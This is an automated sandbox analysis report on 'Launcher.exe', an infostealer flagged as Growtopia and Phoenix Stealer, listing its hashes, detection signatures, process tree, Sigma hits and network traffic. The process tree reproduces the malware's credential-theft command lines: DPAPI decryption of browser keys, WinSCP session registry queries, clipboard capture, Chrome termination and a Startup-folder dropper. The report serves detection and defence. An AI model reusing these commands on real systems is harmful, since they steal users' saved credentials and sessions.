Windows Analysis Report
Launcher.exe

Overview

General Information

Sample name: Launcher.exe
Analysis ID: 1632296
MD5: b3670f482f26691a50a85376ddde32ad
SHA1: 48b5c319abdf25365f3613893139f4f5c2f011f5
SHA256: c67dc6e962a28b421cdff1b27d9efa4ba97c3d467f2e21766d168c66b971926b

Detection

Growtopia, Phoenix Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Growtopia
Yara detected Phoenix Stealer
Drops PE files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Overwrites Mozilla Firefox settings
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious command line found
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Enumeration for 3rd Party Creds From CLI
Sigma detected: PowerShell Get Clipboard
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64_ra
  • Launcher.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: B3670F482F26691A50A85376DDDE32AD)
    • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /d /s /c "hostname" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • HOSTNAME.EXE (PID: 7564 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
    • cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7724 cmdline: powershell.exe -noprofile - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 7940 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 1944 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE00D.tmp" "c:\Users\user\AppData\Local\Temp\0a5bipl0\CSC1B434CDB8C1C4BC4B88560F934C57755.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • reg.exe (PID: 2004 cmdline: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 5192 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 1572 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 1748 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 3220 cmdline: taskkill /IM chrome.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2132 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4452 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 8032 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8048 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6244 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 928 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6464 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6436 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
  • chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,9387240218519264668,4487105206535593677,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Growtopia | According to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims that it has created this software for educational purposes only. This stealer uses the name of a legitimate online game. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.growtopia
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Launcher.exe PID: 6848 | JoeSecurity_Growtopia | Yara detected Growtopia | Joe Security |
Process Memory Space: Launcher.exe PID: 6848 | JoeSecurity_PhoenixStealer | Yara detected Phoenix Stealer | Joe Security |
Process Memory Space: Launcher.exe PID: 6848 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
          Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -noprofile -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7724, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", ProcessId: 7940, ProcessName: csc.exe
          Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", CommandLine: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", CommandLine|base64offset|contains: AA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 6848, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", ProcessId: 2004, ProcessName: reg.exe
          Source: Event Logs, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 53b85763-d2c4-4dc9-8676-bd28e8a7e613 Host Application = powershell Get-Clipboard Engine Version = 5.1.19041.1682 Runspace ID = e6f1a050-a6d1-4009-8ba6-d3a05dd815df Pipeline ID = 1 Command Name = Get-Clipboard Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Get-Clipboard): "Get-Clipboard", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 53b85763-d2c4-4dc9-8676-bd28e8a7e613 Host Application = powershell Get-Clipboard Engine Version = 5.1.19041.1682 Runspace ID = e6f1a050-a6d1-4009-8ba6-d3a05dd815df Pipeline ID = 1 Command Name = Get-Clipboard Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, data1: , data2: CommandInvocation(Get-Clipboard): "Get-Clipboard"
          Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 6848, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", ProcessId: 6244, ProcessName: cmd.exe
          Source: Process started, Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 6848, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", ProcessId: 7644, ProcessName: cmd.exe
          Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Launcher.exe, ProcessId: 6848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe
          Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7724, TargetFilename: C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline
          Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -noprofile -, CommandLine: powershell.exe -noprofile -, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7644, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -noprofile -, ProcessId: 7724, ProcessName: powershell.exe
          Source: Process started, Author: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "hostname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 7564, ProcessName: HOSTNAME.EXE

          Data Obfuscation

          Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -noprofile -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7724, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline", ProcessId: 7940, ProcessName: csc.exe
          No Suricata rule has matched

          AV Detection

          Source: Launcher.exe, Avira: detected
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe, Avira: detection malicious, Label: TR/Redcap.ojtat
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe, ReversingLabs: Detection: 34%
          Source: Launcher.exe, Virustotal: Detection: 48%
          Source: Launcher.exe, ReversingLabs: Detection: 34%
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 95.5% probability
          Source: unknown, HTTPS traffic detected: 144.2.14.25:443 -> 192.168.2.16:49795 version: TLS 1.2
          Source: Launcher.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb\ source: Launcher.exe, 00000000.00000000.1074024698.00007FF65E41B000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb source: Launcher.exe, 00000000.00000000.1074024698.00007FF65E41B000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: Launcher.exe, 00000000.00000003.1398162788.00000174E0553000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394975843.00000089F5C42000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1402314759.00000174E086B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1403784383.00000174E0379000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400003763.00000174E00B6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1398162788.00000174E0508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1407889165.00000174E06D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: Joe Sandbox View, IP Address: 162.159.135.232
          Source: Joe Sandbox View, IP Address: 104.26.13.205
          Source: Joe Sandbox View, JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknown, TCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknown, TCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknown, TCP traffic detected without corresponding DNS query: 144.2.14.25
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global traffic; DNS traffic detected: DNS query: www.google.com
          Source: global traffic; DNS traffic detected: DNS query: apis.google.com
          Source: global traffic; DNS traffic detected: DNS query: play.google.com
          Source: global traffic; DNS traffic detected: DNS query: ogs.google.com
          Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
          Source: global traffic; DNS traffic detected: DNS query: tools.google.com
          Source: global traffic; DNS traffic detected: DNS query: canary.discord.com
          Source: global traffic; DNS traffic detected: DNS query: discord.com
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghost.org).
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
          Source: Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR
          Source: Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer.git
          Source: Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer.gitA
          Source: Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer/issues
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Mithgol)
          Source: Launcher.exe, 00000000.00000003.1138033598.00000174E04E3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Rob--W/proxy-from-env#readme
